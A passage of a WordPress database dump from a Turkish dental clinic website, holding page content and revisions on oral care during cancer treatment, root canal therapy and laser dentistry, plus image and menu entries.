uygulamaksızın antitartar, peroksit ihtiva etmeyen florür ve karbonat içeren bir diş macunu ile yapılmalıdır. İki ayrı diş fırçası değiştirilerek kullanılmalı ve klorheksidinli veya hipokloritli solüsyonlarda yıkanarak, kurutulmalıdır.</li>\r\n 	<li>Ağız duşu ve elektrikli diş fırçası kullanımı tavsiye edilmez.</li>\r\n 	<li>Hasta eğer dişipi kullanıyorsa mumlu ve şerit diş ipi kullanması önerilir eğer kullanmıyorsa kullanıma alıştırmak için uygun bir zaman değildir.</li>\r\n 	<li>Dişler fırçaladıktan sonra günde en az dört kez, sabah, öğle, akşam yemeğinden sonra ve gece yatmadan önce 1 su bardağı kaynatılıp soğutulmuş suya yarım çay kaşığı karbonat (yemek sodası) ilave edilerek hazırlanan ağız gargarası yapılması tavsiye edilir.</li>\r\n 	<li>Özellikle kemoterapiden 7-10 gün sonraki dönemde dişler fırçalanmamalıdır, çünkü bu dönemde dişeti kanaması ve enfeksiyon riski vardır. Fırçalamak yerine ağız gargaraları ve karbonatlı gargara ile ağız temizlenmelidir.</li>\r\n 	<li>Kemoterapi sırasında görülebilen kusmalardan sonra karbonatlı su ile hasta sık sık gargara yapmalıdır.</li>\r\n 	<li>Eğer diş macunu ağzı veya dişleri sızlatıyor, fırçalama sırasında mide bulantısı oluyorsa, ağız karbonatlı gargara ile temizlenmelidir.</li>\r\n 	<li>Kanser tedavisi sırasında mümkünse hareketli protezler takılmamalıdır.</li>\r\n 	<li>Tedavi sonrası dişler düzenli fırçalanmalı, protezler her yemekten sonra ve gece yatarken kesinlikle ağzınızdan çıkarılarak temizlenmelidir. Damağa iyi oturmayan takma dişler kullanılmamalıdır. Protezler temizleyici sıvılar içinde saklanmalıdır.</li>\r\n 	<li>Mantar enfeksiyonu varsa tedavi sadece ağız içi dokulara değil protezlere de uygulanmalıdır.</li>\r\n 	<li>Kurumaya karşı dudaklar vazelin veya dudak yağları ile nemlendirilmelidir.</li>\r\n</ul>\r\n<strong>Ağız kurumasında alınacak genel önlemler</strong>\r\n<ul>\r\n 	<li>Sodalı gargaralar,</li>\r\n 	<li>Sakız, şeker, buz parçaları,</li>\r\n 	<li>Sıvı içeceklerin sık sık alınması,</li>\r\n 	<li>Asitli veya baharatlı gıdalardan kaçınma,</li>\r\n 	<li>Havayı nemlendirme,</li>\r\n 	<li>Tükürük akışını hızlandıran preparatlar…</li>\r\n 	<li>Kolay yutmayı sağlamak için sulu yiyecekler tercih edilmeli ve günde en az iki litre sıvı içilmelidir.</li>\r\n 	<li>Tahrişe neden olabilecek asitli, çok sıcak ve çok soğuk içeceklerden, alkol ve tütün kullanımından kaçınılmalıdır.</li>\r\n 	<li>Baş- boyun bölgesine uygulanan radyoterapide, yaşam boyu süren fluor uygulaması, mevcut dişlerin muhafaza edilmesi ve kemik yıkımının önlenmesi açısından hayati önem taşır. Fluor uygulaması için özel ölçü kaşıkları hazırlanır. Fluorid kaşıklara konur, hasta ağzına yerleştirilir ve ısırtılır. Kaşıklar ağızda en az 5 dakika bırakılır sonra kaşıklar çıkarılır ve ağız durulanır. En az 30 dk. süreyle yenmez içilmez ve diş fırçalanmaz. Fluorid uygulaması günde 1-2 kez yapılmalıdır. Tüm bu önlemlere rağmen ağzınızda, görünüm, his veya tat yönünden bir değişiklik olduğunda doktorunuza veya hemşirenize haber vermelisiniz.</li>\r\n</ul>\r\n[/vc_column_text][/vc_column][/vc_row]', 'Kanser Hastalarında Ağız ve Diş Sağlığı', '', 'inherit', 'closed', 'closed', '', '6285-revision-v1', '', '', '2018-07-13 14:01:34', '2018-07-13 11:01:34', '', 6285, 'http://www.ze-dent.com/6285-revision-v1/', 0, 'revision', '', 0),
(6288, 1, '2018-07-13 14:02:14', '2018-07-13 11:02:14', '[vc_row][vc_column][us_grid columns=\"3\" items_quantity=\"\" pagination=\"infinite\" items_layout=\"6224\" img_size=\"us_600_400_crop\"][/vc_column][/vc_row]', 'Ağız ve Diş Sağlığı', '', 'inherit', 'closed', 'closed', '', '3728-revision-v1', '', '', '2018-07-13 14:02:14', '2018-07-13 11:02:14', '', 3728, 'http://www.ze-dent.com/3728-revision-v1/', 0, 'revision', '', 0),
(6290, 1, '2018-07-13 14:25:22', '2018-07-13 11:25:22', '[vc_row][vc_column][us_logos columns=\"4\" with_indents=\"1\" img_size=\"full\" carousel_dots=\"1\" carousel_center=\"1\" carousel_autoplay=\"1\" carousel_interval=\"2\" breakpoint_1_autoplay=\"1\" breakpoint_2_autoplay=\"1\" breakpoint_3_autoplay=\"1\" items=\"%5B%7B%22image%22%3A%226292%22%7D%2C%7B%22image%22%3A%226294%22%7D%2C%7B%22image%22%3A%226291%22%7D%2C%7B%22image%22%3A%226295%22%7D%2C%7B%22image%22%3A%226293%22%2C%22link%22%3A%22%7C%7C%7C%22%7D%2C%7B%22image%22%3A%226499%22%7D%2C%7B%22image%22%3A%226536%22%7D%2C%7B%22image%22%3A%226534%22%7D%2C%7B%22image%22%3A%226535%22%7D%5D\"][/vc_column][/vc_row]', 'Anlaşmalı Kurumlar', '', 'publish', 'closed', 'closed', '', 'anlasmali-kurumlar', '', '', '2018-07-23 14:17:47', '2018-07-23 11:17:47', '', 0, 'http://www.ze-dent.com/?page_id=6290', 0, 'page', '', 0),
(6291, 1, '2018-07-13 14:22:19', '2018-07-13 11:22:19', '', 'logo1', '', 'inherit', 'closed', 'closed', '', 'logo1', '', '', '2018-07-13 14:22:19', '2018-07-13 11:22:19', '', 6290, 'http://www.ze-dent.com/wp-content/uploads/2018/07/logo1.jpg', 0, 'attachment', 'image/jpeg', 0),
(6292, 1, '2018-07-13 14:22:22', '2018-07-13 11:22:22', '', 'logo2', '', 'inherit', 'closed', 'closed', '', 'logo2', '', '', '2018-07-13 14:22:22', '2018-07-13 11:22:22', '', 6290, 'http://www.ze-dent.com/wp-content/uploads/2018/07/logo2.jpg', 0, 'attachment', 'image/jpeg', 0),
(6293, 1, '2018-07-13 14:22:25', '2018-07-13 11:22:25', '', 'logo3', '', 'inherit', 'closed', 'closed', '', 'logo3', '', '', '2018-07-13 14:22:25', '2018-07-13 11:22:25', '', 6290, 'http://www.ze-dent.com/wp-content/uploads/2018/07/logo3.jpg', 0, 'attachment', 'image/jpeg', 0),
(6294, 1, '2018-07-13 14:22:28', '2018-07-13 11:22:28', '', 'logo4', '', 'inherit', 'closed', 'closed', '', 'logo4', '', '', '2018-07-13 14:22:28', '2018-07-13 11:22:28', '', 6290, 'http://www.ze-dent.com/wp-content/uploads/2018/07/logo4.jpg', 0, 'attachment', 'image/jpeg', 0),
(6295, 1, '2018-07-13 14:22:31', '2018-07-13 11:22:31', '', 'logo-5', '', 'inherit', 'closed', 'closed', '', 'logo-5', '', '', '2018-07-13 14:22:31', '2018-07-13 11:22:31', '', 6290, 'http://www.ze-dent.com/wp-content/uploads/2018/07/logo-5.jpg', 0, 'attachment', 'image/jpeg', 0),
(6296, 1, '2018-07-13 14:24:48', '2018-07-13 11:24:48', '[vc_row][vc_column][us_logos with_indents=\"1\" img_size=\"full\" carousel_dots=\"1\" carousel_center=\"1\" carousel_autoplay=\"1\" carousel_interval=\"2\" breakpoint_1_autoplay=\"1\" breakpoint_2_autoplay=\"1\" breakpoint_3_autoplay=\"1\" items=\"%5B%7B%22image%22%3A%226292%22%7D%2C%7B%22image%22%3A%226294%22%7D%2C%7B%22image%22%3A%226291%22%7D%2C%7B%22image%22%3A%226295%22%7D%2C%7B%22image%22%3A%226293%22%2C%22link%22%3A%22%7C%7C%7C%22%7D%5D\"][/vc_column][/vc_row]', 'Anlaşmalı Kurumlar', '', 'inherit', 'closed', 'closed', '', '6290-revision-v1', '', '', '2018-07-13 14:24:48', '2018-07-13 11:24:48', '', 6290, 'http://www.ze-dent.com/6290-revision-v1/', 0, 'revision', '', 0),
(6297, 1, '2018-07-13 14:30:30', '2018-07-13 11:30:30', ' ', '', '', 'publish', 'closed', 'closed', '', '6297', '', '', '2018-07-18 20:47:08', '2018-07-18 17:47:08', '', 0, 'http://www.ze-dent.com/?p=6297', 3, 'nav_menu_item', '', 0),
(6298, 1, '2018-07-13 17:19:33', '2018-07-13 14:19:33', '[vc_row][vc_column][vc_column_text]<strong>Kanal Tedavisi (Endodonti)</strong>\r\n\r\nÖncelikle şu bilinmelidir ki, doğal dişin yerini hiçbir yapay diş tutmaz. Dolayısıyla doğal dişleri tedavi ederek son noktaya kadar korumalıyız. Dişlerden biri hastalandığında en bilinen koruma yöntemlerinden biri kanal tedavisidir.\r\n\r\nKanal tedavisi hasar görmüş dişlerin korunmasında yardımcıdır. Pulpa (sinir, kan, lenf damarlarını içeren dişin içindeki yumuşak tabaka), kendini tamir edemeyecek derecede hasar gördüğünde ölür. Genellikle buna, kırık dişlerdeki veya derin çürüklerdeki bakteriler sebep olur. Bakteriler, dişin özünde iltihaba yol açar. Hasar görmüş veya hastalanmış pulpa çıkarılmazsa diş ve çevresindeki dokular enfeksiyona maruz kalır. Ve sonunda dişi kaybetme riskiyle karşılaşılır. Kanal tedavisi yapılmazsa enfeksiyon kök ucundaki dokulara kadar ulaşabilir. Dişi çevreleyen çene kemiği de iltihaplanarak aşınır. Meydana gelen bu boşlukta apse oluşur. Bu tabloya ağrı ve şişlik de eşlik eder ve diş kısa zamanda kaybedilir.\r\n\r\nKısacası kanal tedavisi, pulpanın hasar gördüğü durumlarda uygulanan bir tedavi şeklidir. Önceki yıllarda hastalanmış yumuşak diş tabakasıyla karşılaşıldığında tek çözüm çekim iken, günümüzde bu dişleri tedavi etmek mümkündür.[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][us_single_image image=\"6299\" size=\"full\" align=\"center\" onclick=\"lightbox\"][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text]<strong>Kanal tedavisinin aşamaları</strong>\r\n<ul>\r\n 	<li>Öncelikle ağrısız ve acısız bir tedavi olması için dişe anestezi yapılır.</li>\r\n 	<li>Daha sonra çürük temizlenip, dişin özüne ulaşılınca hastalıklı ve yumuşak doku çıkarılır. Sinir ve doku artıkları temizlenir.</li>\r\n 	<li>Kök ucuna kadar diş kanalına şekil verilir. Gerekirse bazı ilaçlar uygulanarak iyileşme hızlandırılabilir.</li>\r\n 	<li>Seanslar arasında diş iyileşene kadar geçici dolgu maddeleriyle dişin üzeri kapatılır.</li>\r\n 	<li>İltihabın üremesinin durduğu anlaşıldıktan ve kök ucundan iltihap gelmesi sona erdikten sonra kanal içerisi özel bir dolgu maddesiyle, kök ucuna kadar doldurulur.</li>\r\n 	<li>Bazı vakalarda bu seanslara hiç gerek olmayıp tek bir seansta da kanal tedavisini sağlıklı bir şekilde kanal tedavisini bitirmek mümkündür.</li>\r\n</ul>\r\nEğer diş tekrar enfekte olmazsa ve çürümesini önleyici tedbirler alınırsa, ömür boyu bu dolgu kullanılabilir. Düzenli diş hekimi kontrolleriniz de enfeksiyonun başlangıcını yakalayabilirsiniz. Ayrıca çok iyi bir ağız bakımı ile de dişin tekrar çürümesi önlenmelidir.[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]', 'Kanal Tedavileri / Endodonti', '', 'publish', 'closed', 'closed', '', 'kanal-tedavileri-endodonti', '', '', '2018-07-13 17:19:33', '2018-07-13 14:19:33', '', 0, 'http://www.ze-dent.com/?post_type=us_portfolio&#038;p=6298', 0, 'us_portfolio', '', 0),
(6299, 1, '2018-07-13 17:14:31', '2018-07-13 14:14:31', '', 'Kanal-Tedavisi-Endodontil', '', 'inherit', 'closed', 'closed', '', 'kanal-tedavisi-endodontil', '', '', '2018-07-13 17:14:31', '2018-07-13 14:14:31', '', 6298, 'http://www.ze-dent.com/wp-content/uploads/2018/07/Kanal-Tedavisi-Endodontil.jpg', 0, 'attachment', 'image/jpeg', 0),
(6300, 1, '2018-07-13 17:14:54', '2018-07-13 14:14:54', '[vc_row][vc_column][vc_column_text]<strong>Kanal Tedavisi (Endodonti)</strong>\r\n\r\nÖncelikle şu bilinmelidir ki, doğal dişin yerini hiçbir yapay diş tutmaz. Dolayısıyla doğal dişleri tedavi ederek son noktaya kadar korumalıyız. Dişlerden biri hastalandığında en bilinen koruma yöntemlerinden biri kanal tedavisidir.\r\n\r\nKanal tedavisi hasar görmüş dişlerin korunmasında yardımcıdır. Pulpa (sinir, kan, lenf damarlarını içeren dişin içindeki yumuşak tabaka), kendini tamir edemeyecek derecede hasar gördüğünde ölür. Genellikle buna, kırık dişlerdeki veya derin çürüklerdeki bakteriler sebep olur. Bakteriler, dişin özünde iltihaba yol açar. Hasar görmüş veya hastalanmış pulpa çıkarılmazsa diş ve çevresindeki dokular enfeksiyona maruz kalır. Ve sonunda dişi kaybetme riskiyle karşılaşılır. Kanal tedavisi yapılmazsa enfeksiyon kök ucundaki dokulara kadar ulaşabilir. Dişi çevreleyen çene kemiği de iltihaplanarak aşınır. Meydana gelen bu boşlukta apse oluşur. Bu tabloya ağrı ve şişlik de eşlik eder ve diş kısa zamanda kaybedilir.\r\n\r\nKısacası kanal tedavisi, pulpanın hasar gördüğü durumlarda uygulanan bir tedavi şeklidir. Önceki yıllarda hastalanmış yumuşak diş tabakasıyla karşılaşıldığında tek çözüm çekim iken, günümüzde bu dişleri tedavi etmek mümkündür.[/vc_column_text][vc_column_text]<strong>Kanal tedavisinin aşamaları</strong>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][us_single_image image=\"6299\" size=\"full\" align=\"center\" onclick=\"lightbox\"][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text]\r\n<ul>\r\n 	<li>Öncelikle ağrısız ve acısız bir tedavi olması için dişe anestezi yapılır.</li>\r\n 	<li>Daha sonra çürük temizlenip, dişin özüne ulaşılınca hastalıklı ve yumuşak doku çıkarılır. Sinir ve doku artıkları temizlenir.</li>\r\n 	<li>Kök ucuna kadar diş kanalına şekil verilir. Gerekirse bazı ilaçlar uygulanarak iyileşme hızlandırılabilir.</li>\r\n 	<li>Seanslar arasında diş iyileşene kadar geçici dolgu maddeleriyle dişin üzeri kapatılır.</li>\r\n 	<li>İltihabın üremesinin durduğu anlaşıldıktan ve kök ucundan iltihap gelmesi sona erdikten sonra kanal içerisi özel bir dolgu maddesiyle, kök ucuna kadar doldurulur.</li>\r\n 	<li>Bazı vakalarda bu seanslara hiç gerek olmayıp tek bir seansta da kanal tedavisini sağlıklı bir şekilde kanal tedavisini bitirmek mümkündür.</li>\r\n</ul>\r\nEğer diş tekrar enfekte olmazsa ve çürümesini önleyici tedbirler alınırsa, ömür boyu bu dolgu kullanılabilir. Düzenli diş hekimi kontrolleriniz de enfeksiyonun başlangıcını yakalayabilirsiniz. Ayrıca çok iyi bir ağız bakımı ile de dişin tekrar çürümesi önlenmelidir.[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]', 'Kanal Tedavileri / Endodonti', '', 'inherit', 'closed', 'closed', '', '6298-revision-v1', '', '', '2018-07-13 17:14:54', '2018-07-13 14:14:54', '', 6298, 'http://www.ze-dent.com/6298-revision-v1/', 0, 'revision', '', 0),
(6301, 1, '2018-07-13 17:15:59', '2018-07-13 14:15:59', '[vc_row][vc_column][vc_column_text]<strong>Kanal Tedavisi (Endodonti)</strong>\r\n\r\nÖncelikle şu bilinmelidir ki, doğal dişin yerini hiçbir yapay diş tutmaz. Dolayısıyla doğal dişleri tedavi ederek son noktaya kadar korumalıyız. Dişlerden biri hastalandığında en bilinen koruma yöntemlerinden biri kanal tedavisidir.\r\n\r\nKanal tedavisi hasar görmüş dişlerin korunmasında yardımcıdır. Pulpa (sinir, kan, lenf damarlarını içeren dişin içindeki yumuşak tabaka), kendini tamir edemeyecek derecede hasar gördüğünde ölür. Genellikle buna, kırık dişlerdeki veya derin çürüklerdeki bakteriler sebep olur. Bakteriler, dişin özünde iltihaba yol açar. Hasar görmüş veya hastalanmış pulpa çıkarılmazsa diş ve çevresindeki dokular enfeksiyona maruz kalır. Ve sonunda dişi kaybetme riskiyle karşılaşılır. Kanal tedavisi yapılmazsa enfeksiyon kök ucundaki dokulara kadar ulaşabilir. Dişi çevreleyen çene kemiği de iltihaplanarak aşınır. Meydana gelen bu boşlukta apse oluşur. Bu tabloya ağrı ve şişlik de eşlik eder ve diş kısa zamanda kaybedilir.\r\n\r\nKısacası kanal tedavisi, pulpanın hasar gördüğü durumlarda uygulanan bir tedavi şeklidir. Önceki yıllarda hastalanmış yumuşak diş tabakasıyla karşılaşıldığında tek çözüm çekim iken, günümüzde bu dişleri tedavi etmek mümkündür.[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][us_single_image image=\"6299\" size=\"full\" align=\"center\" onclick=\"lightbox\"][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text]<strong>Kanal tedavisinin aşamaları</strong>\r\n<ul>\r\n 	<li>Öncelikle ağrısız ve acısız bir tedavi olması için dişe anestezi yapılır.</li>\r\n 	<li>Daha sonra çürük temizlenip, dişin özüne ulaşılınca hastalıklı ve yumuşak doku çıkarılır. Sinir ve doku artıkları temizlenir.</li>\r\n 	<li>Kök ucuna kadar diş kanalına şekil verilir. Gerekirse bazı ilaçlar uygulanarak iyileşme hızlandırılabilir.</li>\r\n 	<li>Seanslar arasında diş iyileşene kadar geçici dolgu maddeleriyle dişin üzeri kapatılır.</li>\r\n 	<li>İltihabın üremesinin durduğu anlaşıldıktan ve kök ucundan iltihap gelmesi sona erdikten sonra kanal içerisi özel bir dolgu maddesiyle, kök ucuna kadar doldurulur.</li>\r\n 	<li>Bazı vakalarda bu seanslara hiç gerek olmayıp tek bir seansta da kanal tedavisini sağlıklı bir şekilde kanal tedavisini bitirmek mümkündür.</li>\r\n</ul>\r\nEğer diş tekrar enfekte olmazsa ve çürümesini önleyici tedbirler alınırsa, ömür boyu bu dolgu kullanılabilir. Düzenli diş hekimi kontrolleriniz de enfeksiyonun başlangıcını yakalayabilirsiniz. Ayrıca çok iyi bir ağız bakımı ile de dişin tekrar çürümesi önlenmelidir.[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]', 'Kanal Tedavileri / Endodonti', '', 'inherit', 'closed', 'closed', '', '6298-revision-v1', '', '', '2018-07-13 17:15:59', '2018-07-13 14:15:59', '', 6298, 'http://www.ze-dent.com/6298-revision-v1/', 0, 'revision', '', 0),
(6302, 1, '2018-07-13 17:18:55', '2018-07-13 14:18:55', '', 'kanal-tedavi', '', 'inherit', 'closed', 'closed', '', 'kanal-tedavi', '', '', '2018-07-13 17:18:55', '2018-07-13 14:18:55', '', 6298, 'http://www.ze-dent.com/wp-content/uploads/2018/07/kanal-tedavi.jpg', 0, 'attachment', 'image/jpeg', 0),
(6318, 1, '2018-07-13 17:24:49', '2018-07-13 14:24:49', ' ', '', '', 'publish', 'closed', 'closed', '', '6318', '', '', '2018-07-18 20:47:08', '2018-07-18 17:47:08', '', 0, 'http://www.ze-dent.com/?p=6318', 27, 'nav_menu_item', '', 0),
(6319, 1, '2018-07-13 17:24:49', '2018-07-13 14:24:49', '', 'Estetik Diş Hekimliği', '', 'publish', 'closed', 'closed', '', 'estetik-dis-hekimligi', '', '', '2018-07-18 20:47:08', '2018-07-18 17:47:08', '', 0, 'http://www.ze-dent.com/?p=6319', 20, 'nav_menu_item', '', 0),
(6320, 1, '2018-07-13 17:24:49', '2018-07-13 14:24:49', '', 'İmplant Cerrahisi', '', 'publish', 'closed', 'closed', '', 'implant-cerrahisi', '', '', '2018-07-18 20:47:08', '2018-07-18 17:47:08', '', 0, 'http://www.ze-dent.com/?p=6320', 12, 'nav_menu_item', '', 0),
(6321, 1, '2018-07-13 17:24:49', '2018-07-13 14:24:49', '', 'Ağız, Diş ve Çene Cerrahisi', '', 'publish', 'closed', 'closed', '', 'dis-cerrahisi', '', '', '2018-07-18 20:47:08', '2018-07-18 17:47:08', '', 0, 'http://www.ze-dent.com/?p=6321', 7, 'nav_menu_item', '', 0),
(6322, 1, '2018-07-13 17:35:03', '2018-07-13 14:35:03', '[vc_row][vc_column][vc_column_text]<strong>Lazer ile tedavinin uygulama alanları</strong>\r\n\r\nLazer enerjisi diğer tıp alanlarında kullanıldığı gibi diş hekimliğinde de aktif bir biçimde kullanılabilmektedir. Son yıllara kadar sadece dişetleri gibi yumuşak doku ve beyazlatmada kullanılan lazer enerjisi, atomize su ile birleştirilip elde edilen hidrokinetik enerji sayesinde diş, kemik gibi sert dokularda da kullanılmaya başlanmıştır.\r\n\r\n<strong>Uygulama alanları sıralamak gerekirse;</strong>\r\n<ul>\r\n 	<li>Lazer ile dolgu öncesi ağız hazırlığı - çürük temizlenmesi</li>\r\n 	<li>Kanal tedavisi</li>\r\n 	<li>Dişeti tedavileri\r\n<ul>\r\n 	<li>Estetik amaçlı gülme hattının düzenlenmesi (özellikle güldüğü zaman dişetleri çok görünen hastalarda)</li>\r\n 	<li>Küretaj (derin dişeti temizliği)</li>\r\n 	<li>Depigmentasyon (dişetlerinde oluşan pigmentlerin temizliği)</li>\r\n 	<li>Yumuşak doku lezyonlarının çıkarılması</li>\r\n</ul>\r\n</li>\r\n 	<li>Aft ve uçuk tedavileri</li>\r\n 	<li>Diş hassasiyetleri tedavisi (dentin kanallarının kapatılması)</li>\r\n 	<li>Diş beyazlatma</li>\r\n 	<li>Cerrahi tedaviler (20 yaş dişleri, implant, ağız ve çene ameliyatları gibi)</li>\r\n 	<li>Biostimülasyon (cerrahi operasyon sonrasında duyulan ağrıların oluşumunun önlenmesi gibi)</li>\r\n</ul>\r\nYukarıda sayılan lazer ile tedavi yöntemlerinde hastaların tedavi sonrası iyileşme süreçleri çok daha kısa olup, memnuniyetleri klasik yöntemlere göre çok daha yüksek olmaktadır.[/vc_column_text][vc_column_text]<strong>Lazer ile tedavinin avantajları</strong>\r\n\r\nLazer ile diş tedavisinde diğer dokulara temas edilmeden çalışıldığı için ısı ve titreşim oluşmaz. Bu nedenle hastada ağrı oluşmaz ve anesteziye gerek kalmadan diş tedavileri yapılabilir. Lazerin bu özelliği anestezi yapılamayan, korkan ve ciddi bir rahatsızlığı olan hastalarda lazeri tercih sebebi yapar. Ayrıca anestezi sonrası duyulan şişkinlik, yemek yiyememe, konuşma zorluğu gibi rahatsızlıklar oluşmaz.\r\n\r\nHastaları rahatsız eden ve cihazlarımızdan çıkan yüksek ses lazerde yoktur. Bu nedenle hastalarımız daha konforlu bir tedavi görmektedir.\r\n\r\nLazer ile yapılan cerrahi tedavilerde hastada kanama oluşmaz. Ayrıca su ile çalışıldığı ve normalden daha az travma verildiği için operasyon sonrası oluşabilecek şişme, morluk gibi komplikasyonlar önlenmiş olur.[/vc_column_text][/vc_column][/vc_row]', 'Lazer ile Tedavi', '', 'publish', 'closed', 'closed', '', 'lazer-ile-tedavi', '', '', '2018-07-13 17:53:34', '2018-07-13 14:53:34', '', 0, 'http://www.ze-dent.com/?post_type=us_portfolio&#038;p=6322', 0, 'us_portfolio', '', 0),
(6323, 1, '2018-07-13 17:31:06', '2018-07-13 14:31:06', '', 'lazer-tedavi', '', 'inherit', 'closed', 'closed', '', 'lazer-tedavi', '', '', '2018-07-13 17:31:06', '2018-07-13 14:31:06', '', 6322, 'http://www.ze-dent.com/wp-content/uploads/2018/07/lazer-tedavi.jpg', 0, 'attachment', 'image/jpeg', 0),
(6325, 1, '2018-07-13 17:32:02', '2018-07-13 14:32:02', '[vc_row][vc_column][vc_column_text]<strong>Lazer ile tedavinin uygulama alanları</strong>\r\n\r\nLazer enerjisi diğer tıp alanlarında kullanıldığı gibi diş hekimliğinde de aktif bir biçimde kullanılabilmektedir. Son yıllara kadar sadece dişetleri gibi yumuşak doku ve beyazlatmada kullanılan lazer enerjisi, atomize su ile birleştirilip elde edilen hidrokinetik enerji sayesinde diş, kemik gibi sert dokularda da kullanılmaya başlanmıştır.\r\n\r\nUygulama alanları sıralamak gerekirse;\r\nLazer ile dolgu öncesi ağız hazırlığı - çürük temizlenmesi\r\nKanal tedavisi\r\nDişeti tedavileri\r\n<ul>\r\n 	<li>Estetik amaçlı gülme hattının düzenlenmesi (özellikle güldüğü zaman dişetleri çok görünen hastalarda)</li>\r\n 	<li>Küretaj (derin dişeti temizliği)</li>\r\n 	<li>Depigmentasyon (dişetlerinde oluşan pigmentlerin temizliği)</li>\r\n 	<li>Yumuşak doku lezyonlarının çıkarılması</li>\r\n</ul>\r\nAft ve uçuk tedavileri\r\nDiş hassasiyetleri tedavisi (dentin kanallarının kapatılması)\r\nDiş beyazlatma\r\nCerrahi tedaviler (20 yaş dişleri, implant, ağız ve çene ameliyatları gibi)\r\nBiostimülasyon (cerrahi operasyon sonrasında duyulan ağrıların oluşumunun önlenmesi gibi)\r\n\r\nYukarıda sayılan lazer ile tedavi yöntemlerinde hastaların tedavi sonrası iyileşme süreçleri çok daha kısa olup, memnuniyetleri klasik yöntemlere göre çok daha yüksek olmaktadır.\r\n\r\n<strong>Lazer ile tedavinin avantajları</strong>\r\n\r\nLazer ile diş tedavisinde diğer dokulara temas edilmeden çalışıldığı için ısı ve titreşim oluşmaz. Bu nedenle hastada ağrı oluşmaz ve anesteziye gerek kalmadan diş tedavileri yapılabilir. Lazerin bu özelliği anestezi yapılamayan, korkan ve ciddi bir rahatsızlığı olan hastalarda lazeri tercih sebebi yapar. Ayrıca anestezi sonrası duyulan şişkinlik, yemek yiyememe, konuşma zorluğu gibi rahatsızlıklar oluşmaz.\r\n\r\nHastaları rahatsız eden ve cihazlarımızdan çıkan yüksek ses lazerde yoktur. Bu nedenle hastalarımız daha konforlu bir tedavi görmektedir.\r\n\r\nLazer ile yapılan cerrahi tedavilerde hastada kanama oluşmaz. Ayrıca su ile çalışıldığı ve normalden daha az travma verildiği için operasyon sonrası oluşabilecek şişme, morluk gibi komplikasyonlar önlenmiş olur.[/vc_column_text][us_single_image image=\"6324\" size=\"full\" align=\"center\" onclick=\"lightbox\"][/vc_column][/vc_row]', 'Lazer ile Tedavi', '', 'inherit', 'closed', 'closed', '', '6322-revision-v1', '', '', '2018-07-13 17:32:02', '2018-07-13 14:32:02', '', 6322, 'http://www.ze-dent.com/6322-revision-v1/', 0, 'revision', '', 0),
(6326, 1, '2018-07-13 17:34:19', '2018-07-13 14:34:19', '[vc_row][vc_column width=\"1/2\"][vc_column_text]<strong>Lazer ile tedavinin uygulama alanları</strong>\r\n\r\nLazer enerjisi diğer tıp alanlarında kullanıldığı gibi diş hekimliğinde de aktif bir biçimde kullanılabilmektedir. Son yıllara kadar sadece dişetleri gibi yumuşak doku ve beyazlatmada kullanılan lazer enerjisi, atomize su ile birleştirilip elde edilen hidrokinetik enerji sayesinde diş, kemik gibi sert dokularda da kullanılmaya başlanmıştır.\r\n\r\nUygulama alanları sıralamak gerekirse;\r\nLazer ile dolgu öncesi ağız hazırlığı - çürük temizlenmesi\r\nKanal tedavisi\r\nDişeti tedavileri\r\n<ul>\r\n 	<li>Estetik amaçlı gülme hattının düzenlenmesi (özellikle güldüğü zaman dişetleri çok görünen hastalarda)</li>\r\n 	<li>Küretaj (derin dişeti temizliği)</li>\r\n 	<li>Depigmentasyon (dişetlerinde oluşan pigmentlerin temizliği)</li>\r\n 	<li>Yumuşak doku lezyonlarının çıkarılması</li>\r\n</ul>\r\nAft ve uçuk tedavileri\r\nDiş hassasiyetleri tedavisi (dentin kanallarının kapatılması)\r\nDiş beyazlatma\r\nCerrahi tedaviler (20 yaş dişleri, implant, ağız ve çene ameliyatları gibi)\r\nBiostimülasyon (cerrahi operasyon sonrasında duyulan ağrıların oluşumunun önlenmesi gibi)\r\n\r\nYukarıda sayılan lazer ile tedavi yöntemlerinde hastaların tedavi sonrası iyileşme süreçleri çok daha kısa olup, memnuniyetleri klasik yöntemlere göre çok daha yüksek olmaktadır.[/vc_column_text][/vc_column][vc_column width=\"1/2\"][us_single_image image=\"6323\" size=\"full\" align=\"center\" onclick=\"lightbox\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]<strong>Lazer ile tedavinin avantajları</strong>\r\n\r\nLazer ile diş tedavisinde diğer dokulara temas edilmeden çalışıldığı için ısı ve titreşim oluşmaz. Bu nedenle hastada ağrı oluşmaz ve anesteziye gerek kalmadan diş tedavileri yapılabilir. Lazerin bu özelliği anestezi yapılamayan, korkan ve ciddi bir rahatsızlığı olan hastalarda lazeri tercih sebebi yapar. Ayrıca anestezi sonrası duyulan şişkinlik, yemek yiyememe, konuşma zorluğu gibi rahatsızlıklar oluşmaz.\r\n\r\nHastaları rahatsız eden ve cihazlarımızdan çıkan yüksek ses lazerde yoktur. Bu nedenle hastalarımız daha konforlu bir tedavi görmektedir.\r\n\r\nLazer ile yapılan cerrahi tedavilerde hastada kanama oluşmaz. Ayrıca su ile çalışıldığı ve normalden daha az travma verildiği için operasyon sonrası oluşabilecek şişme, morluk gibi komplikasyonlar önlenmiş olur.[/vc_column_text][/vc_column][/vc_row]', 'Lazer ile Tedavi', '', 'inherit', 'closed', 'closed', '', '6322-revision-v1', '', '', '2018-07-13 17:34:19', '2018-07-13 14:34:19', '', 6322, 'http://www.ze-dent.com/6322-revision-v1/', 0, 'revision', '', 0),
